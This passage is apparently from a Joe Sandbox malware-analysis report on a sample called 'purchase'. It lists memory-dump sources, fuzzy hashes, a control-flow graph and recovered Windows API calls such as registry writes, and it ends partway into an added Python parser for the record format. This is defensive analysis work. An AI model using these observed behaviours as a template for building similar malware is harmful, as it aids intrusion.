                                          • Associated: 00000000.00000002.1473857959.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473857959.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473857959.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473857959.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473857959.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473857959.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473857959.000000000043B000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473857959.000000000044A000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1474076538.000000000044D000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_purchase.jbxd
                                          Similarity
                                          • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                          • String ID: C:\Users\user\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes\Databehandlende\Tilsmil
                                          • API String ID: 1892508949-3069811719
                                          • Opcode ID: c6adeddc9a0f3146ad326abe4ad94d0b73c70f6bd455b8f7f02732671ca1c312
                                          • Instruction ID: 707209c2395922376f9f001c82b8f9212c950a3f0646f554414056ec45e3a30b
                                          • Opcode Fuzzy Hash: c6adeddc9a0f3146ad326abe4ad94d0b73c70f6bd455b8f7f02732671ca1c312
                                          • Instruction Fuzzy Hash: DC11B231504514EBDF206FA5CD415AF36B0EF14368B25493FE942B22F1D63E4A81DA9D

                                          Control-flow Graph
                                          control_flow_graph 790 407094-40709a 791 40709c-40709e 790->791 792 40709f-4070bd 790->792 791->792 793 407390-40739d 792->793 794 4072cb-4072e0 792->794 795 4073c7-4073cb 793->795 796 4072e2-4072f8 794->796 797 4072fa-407310 794->797 798 40742b-40743e 795->798 799 4073cd-4073ee 795->799 800 407313-40731a 796->800 797->800 801 407347-40734d 798->801 802 4073f0-407405 799->802 803 407407-40741a 799->803 804 407341 800->804 805 40731c-407320 800->805 811 406af2 801->811 812 4074fa 801->812 806 40741d-407424 802->806 803->806 804->801 807 407326-40733e 805->807 808 4074cf-4074d9 805->808 813 4073c4 806->813 814 407426 806->814 807->804 810 4074e5-4074f8 808->810 815 4074fd-407501 810->815 816 406af9-406afd 811->816 817 406c39-406c5a 811->817 818 406b9e-406ba2 811->818 819 406c0e-406c12 811->819 812->815 813->795 823 4073a9-4073c1 814->823 824 4074db 814->824 816->810 825 406b03-406b10 816->825 817->794 821 406ba8-406bc1 818->821 822 40744e-407458 818->822 826 406c18-406c2c 819->826 827 40745d-407467 819->827 828 406bc4-406bc8 821->828 822->810 823->813 824->810 825->812 829 406b16-406b5c 825->829 830 406c2f-406c37 826->830 827->810 828->818 831 406bca-406bd0 828->831 832 406b84-406b86 829->832 833 406b5e-406b62 829->833 830->817 830->819 834 406bd2-406bd9 831->834 835 406bfa-406c0c 831->835 838 406b94-406b9c 832->838 839 406b88-406b92 832->839 836 406b64-406b67 GlobalFree 833->836 837 406b6d-406b7b GlobalAlloc 833->837 840 406be4-406bf4 GlobalAlloc 834->840 841 406bdb-406bde GlobalFree 834->841 835->830 836->837 837->812 842 406b81 837->842 838->828 839->838 839->839 840->812 840->835 841->840 842->832
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1473809836.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1473750419.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473836494.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473857959.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473857959.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473857959.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473857959.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473857959.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473857959.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473857959.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473857959.000000000043B000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473857959.000000000044A000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1474076538.000000000044D000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_purchase.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 2ff22e2e2fe9ce3de78e7ddd3335664d820a6fec416f6b591a6c72a947d9530d
                                          • Instruction ID: 57bf2fd90c69a3a2134d3ca1d9604f9a54cf20ddad3feead76618616929b2f58
                                          • Opcode Fuzzy Hash: 2ff22e2e2fe9ce3de78e7ddd3335664d820a6fec416f6b591a6c72a947d9530d
                                          • Instruction Fuzzy Hash: 17A15471E04229CBDF28CFA8C8546ADBBB1FF44305F10846ED816BB281D7786A86DF45
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1473809836.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1473750419.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473836494.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473857959.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473857959.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473857959.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473857959.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473857959.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473857959.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473857959.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473857959.000000000043B000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473857959.000000000044A000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1474076538.000000000044D000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_purchase.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 0bdb7e84a84856003d11171116f50dfbd9bb9a779b2e7a3e4899fdc47cedc848
                                          • Instruction ID: 6b1c66eb9f97b1ade68f1d395623a9ed29f1776dbc94043a645b3c6b65beda35
                                          • Opcode Fuzzy Hash: 0bdb7e84a84856003d11171116f50dfbd9bb9a779b2e7a3e4899fdc47cedc848
                                          • Instruction Fuzzy Hash: C5912270E04228CBDF28CF98C854BADBBB1FF44305F14816AD856BB281D778A986DF45
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1473809836.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1473750419.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473836494.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473857959.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473857959.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473857959.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473857959.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473857959.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473857959.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473857959.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473857959.000000000043B000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473857959.000000000044A000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1474076538.000000000044D000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_purchase.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: be7a598e94a0405de8a772e3f69c54869daecda94b4303a07673bf76e2652f1c
                                          • Instruction ID: ce41943af36f178b06a8ef9aeec7331a28cc36c4f565c07526a7a1ecbc0683f6
                                          • Opcode Fuzzy Hash: be7a598e94a0405de8a772e3f69c54869daecda94b4303a07673bf76e2652f1c
                                          • Instruction Fuzzy Hash: 8C813571E04228CFDF24CFA8C844BADBBB1FB45305F24816AD456BB281D778A986DF45
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1473809836.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                           • Associated: 00000000.00000002.1473750419.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1473836494.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1473857959.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1473857959.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1473857959.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1473857959.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1473857959.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1473857959.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1473857959.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1473857959.000000000043B000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1473857959.000000000044A000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1474076538.000000000044D000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_purchase.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 32d59b201beac9d8f322f7ad5055b4a277c8e7969ed8db35c8d1fbf5724c7b18
                                          • Instruction ID: 8f4657df29e0a6c4f41eae1c6e560b42ebe12933d6c33c39fa024371cffe791d
                                          • Opcode Fuzzy Hash: 32d59b201beac9d8f322f7ad5055b4a277c8e7969ed8db35c8d1fbf5724c7b18
                                          • Instruction Fuzzy Hash: F4815771E04228DBDF24CFA8C8447ADBBB1FF44315F10816AD856BB281D7786986DF45
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1473809836.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                           • Associated: 00000000.00000002.1473750419.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1473836494.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1473857959.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1473857959.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1473857959.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1473857959.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1473857959.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1473857959.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1473857959.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1473857959.000000000043B000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1473857959.000000000044A000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1474076538.000000000044D000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_purchase.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 5ad3ccd1842de9fa96a72a1c56b2a37abd66cddd4bfb2a4aa43cc43f3deb674d
                                          • Instruction ID: 467485e0bb60f7ca81b57cb4e762169b1f98b62e9d0b722d18e83a7fcf81438f
                                          • Opcode Fuzzy Hash: 5ad3ccd1842de9fa96a72a1c56b2a37abd66cddd4bfb2a4aa43cc43f3deb674d
                                          • Instruction Fuzzy Hash: 04711375E04228CBDF24CFA8C844BADBBF1FB48305F15806AD856B7281D778A986DF45
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1473809836.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                           • Associated: 00000000.00000002.1473750419.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1473836494.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1473857959.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1473857959.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1473857959.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1473857959.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1473857959.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1473857959.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1473857959.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1473857959.000000000043B000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1473857959.000000000044A000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1474076538.000000000044D000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_purchase.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 702cc36666a341df00ed023e166d9505421316bb70e071c2ca241f15019959e6
                                          • Instruction ID: 8594309fab6a939f8579025671b20e25c27ad2f20b93bd04310bc8f9388019e2
                                          • Opcode Fuzzy Hash: 702cc36666a341df00ed023e166d9505421316bb70e071c2ca241f15019959e6
                                          • Instruction Fuzzy Hash: A6713471E04228CBDF28CF98C844BADBBB1FF45305F14806AD816BB281D778A986DF45
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1473809836.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                           • Associated: 00000000.00000002.1473750419.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1473836494.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1473857959.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1473857959.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1473857959.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1473857959.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1473857959.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1473857959.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1473857959.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1473857959.000000000043B000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1473857959.000000000044A000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1474076538.000000000044D000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_purchase.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 97fac772243d771687d70cd7bd51d4e603ca3fb4096038018fdbee07d45d8760
                                          • Instruction ID: 804367245b599a5d262e6525417658d62bb0317a144133a249ff79fbb491f744
                                          • Opcode Fuzzy Hash: 97fac772243d771687d70cd7bd51d4e603ca3fb4096038018fdbee07d45d8760
                                          • Instruction Fuzzy Hash: 04712571E04228CBDF28CF98C854BADBBB1FF44305F15806AD856B7281C778A986DF45
                                          APIs
                                          • GlobalFree.KERNEL32(00000000), ref: 00401C30
                                          • GlobalAlloc.KERNELBASE(00000040,00000804), ref: 00401C42
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1473809836.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                           • Associated: 00000000.00000002.1473750419.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1473836494.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1473857959.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1473857959.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1473857959.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1473857959.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1473857959.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1473857959.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1473857959.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1473857959.000000000043B000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1473857959.000000000044A000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1474076538.000000000044D000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_purchase.jbxd
                                          Similarity
                                          • API ID: Global$AllocFree
                                          • String ID: 32079
                                          • API String ID: 3394109436-2447952077
                                          • Opcode ID: 447f2160a9f8a762491bb83b7e5e8947865ce659ff46afcc73d93e079212092c
                                          • Instruction ID: b885d26f68b874ad9ff9a305e80acb85bda866dca5011e4f065ba1a91b1516cf
                                          • Opcode Fuzzy Hash: 447f2160a9f8a762491bb83b7e5e8947865ce659ff46afcc73d93e079212092c
                                          • Instruction Fuzzy Hash: 09218473904610ABD730ABA4DE85A6E72A4AB04328715053FF952B32D4C6BCE8919B5D
                                          APIs
                                          • lstrlenW.KERNEL32(0040B5C8,00000023,00000011,00000002), ref: 004024FA
                                          • RegSetValueExW.ADVAPI32(?,?,?,?,0040B5C8,00000000,00000011,00000002), ref: 0040253A
                                          • RegCloseKey.ADVAPI32(?,?,?,0040B5C8,00000000,00000011,00000002), ref: 00402622
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1473809836.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                           • Associated: 00000000.00000002.1473750419.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1473836494.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1473857959.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1473857959.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1473857959.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1473857959.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1473857959.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1473857959.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1473857959.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1473857959.000000000043B000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1473857959.000000000044A000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1474076538.000000000044D000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_purchase.jbxd
                                          Similarity
                                          • API ID: CloseValuelstrlen
                                          • String ID:
                                          • API String ID: 2655323295-0
                                          • Opcode ID: 833edd450bf946c24d3a3f94cfbbaf1e2376c793e7492529022bf014ff981997
                                          • Instruction ID: 8b3a83999d63c16b18a9973427bcf430ab7992b94c8fe07ed2dd95b358db5eaa
                                          • Opcode Fuzzy Hash: 833edd450bf946c24d3a3f94cfbbaf1e2376c793e7492529022bf014ff981997
                                          • Instruction Fuzzy Hash: 1611B431D00114BEDB00AFA5DE59AAEB6B4EF44318F20443FF400B61D1C7B88E409668
                                          APIs
                                          • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                          • SendMessageW.USER32(0040A2D8,00000402,00000000), ref: 004013F4
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1473809836.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                           • Associated: 00000000.00000002.1473750419.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1473836494.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1473857959.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1473857959.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1473857959.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1473857959.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1473857959.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1473857959.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1473857959.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1473857959.000000000043B000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1473857959.000000000044A000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1474076538.000000000044D000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_purchase.jbxd
                                          Similarity
                                          • API ID: MessageSend
                                          • String ID:
                                          • API String ID: 3850602802-0
                                          • Opcode ID: 24120cd7971efbcf380a3cfcf85aef56aa5faf56da28ec4d1ccb8bb0957475b6
                                          • Instruction ID: 2b867b2a322a557ec20ecaa395e060e0be7e2a6973b32d365fcb6e947ad1390c
                                          • Opcode Fuzzy Hash: 24120cd7971efbcf380a3cfcf85aef56aa5faf56da28ec4d1ccb8bb0957475b6
                                          • Instruction Fuzzy Hash: 9E01F4327242209BE7195B389D05B6B3798E710314F10863FF855F66F1DA78CC429B4C
                                          APIs
                                          • OleInitialize.OLE32(00000000), ref: 004056A9
                                            • Part of subcall function 0040450C: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040451E
                                          • CoUninitialize.COMBASE(00000404,00000000), ref: 004056F5
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1473809836.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                           • Associated: 00000000.00000002.1473750419.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1473836494.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1473857959.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1473857959.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1473857959.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1473857959.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1473857959.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1473857959.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1473857959.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1473857959.000000000043B000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1473857959.000000000044A000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1474076538.000000000044D000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_purchase.jbxd
                                          Similarity
                                          • API ID: InitializeMessageSendUninitialize
                                          • String ID:
                                          • API String ID: 2896919175-0
                                          • Opcode ID: e6b44ab65c096e2096ca35a4d59063f1915fe47593d787d59728b780318f1d57
                                          • Instruction ID: b888f1dcde8397bdf9a4ac710541df7d57aeeece4d3a8f29a6716c55d94af5f1
                                          • Opcode Fuzzy Hash: e6b44ab65c096e2096ca35a4d59063f1915fe47593d787d59728b780318f1d57
                                          • Instruction Fuzzy Hash: 0AF0B4776007409BE7115B54AE05B5B77B0EB90354F85483AEF8D726F1C7764C028B5D
                                          APIs
                                          • ShowWindow.USER32(00000000,00000000), ref: 00401F21
                                          • EnableWindow.USER32(00000000,00000000), ref: 00401F2C
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1473809836.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                           • Associated: 00000000.00000002.1473750419.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1473836494.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1473857959.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1473857959.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1473857959.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1473857959.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1473857959.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1473857959.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1473857959.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1473857959.000000000043B000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1473857959.000000000044A000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1474076538.000000000044D000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_purchase.jbxd
                                          Similarity
                                          • API ID: Window$EnableShow
                                          • String ID:
                                          • API String ID: 1136574915-0
                                          • Opcode ID: f524000984b40da921d67aceb392e6b1a27f4445b9fdd89c88039cce022366aa
                                          • Instruction ID: cc057469d20fee5af05168c8280afa7b014ceb16d0f4b1b408cb009327ac905f
                                          • Opcode Fuzzy Hash: f524000984b40da921d67aceb392e6b1a27f4445b9fdd89c88039cce022366aa
                                          • Instruction Fuzzy Hash: 7BE04876908610DFE754EBA4AE495EE73B4EF80365B10097FE001F11D1D7B94D00975D
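The function records in this listing follow a fixed layout: an optional APIs block (one call per bullet, with the module, the recovered arguments and the call-site address), a Memory Dump Source block, and a Similarity block that ends with the Instruction Fuzzy Hash. The example below is an added one, not part of the Joe Sandbox report or of its IDA plugin: it parses that layout into records and tags each function by the Win32 APIs it calls, then decodes the dwCreationFlags argument of any CreateProcess* call. The sample text is a trimmed copy of three records from this page (the GlobalAlloc/GlobalFree, RegSetValueExW and CreateProcessW functions; the last is cut off on the page, so it has no fuzzy-hash line). The tag names and the choice of flag constants are this example's own assumptions, not Joe Sandbox signature names; the flag values themselves are the documented Win32 constants.

```python
"""Parse Joe Sandbox IDA-plugin function records (the listing format on this
page) and tag each function by the Win32 APIs it calls.
Added example; not part of the report or of Joe Sandbox's own tooling."""
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Constructed sample: three records copied from the listing, trimmed to the
# fields the parser reads. The CreateProcessW record is cut off on the page
# (no fuzzy-hash line), so it closes at end-of-text instead.
SAMPLE = """\
APIs
• GlobalFree.KERNEL32(00000000), ref: 00401C30
• GlobalAlloc.KERNELBASE(00000040,00000804), ref: 00401C42
Strings
Memory Dump Source
• Source File: 00000000.00000002.1473809836.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
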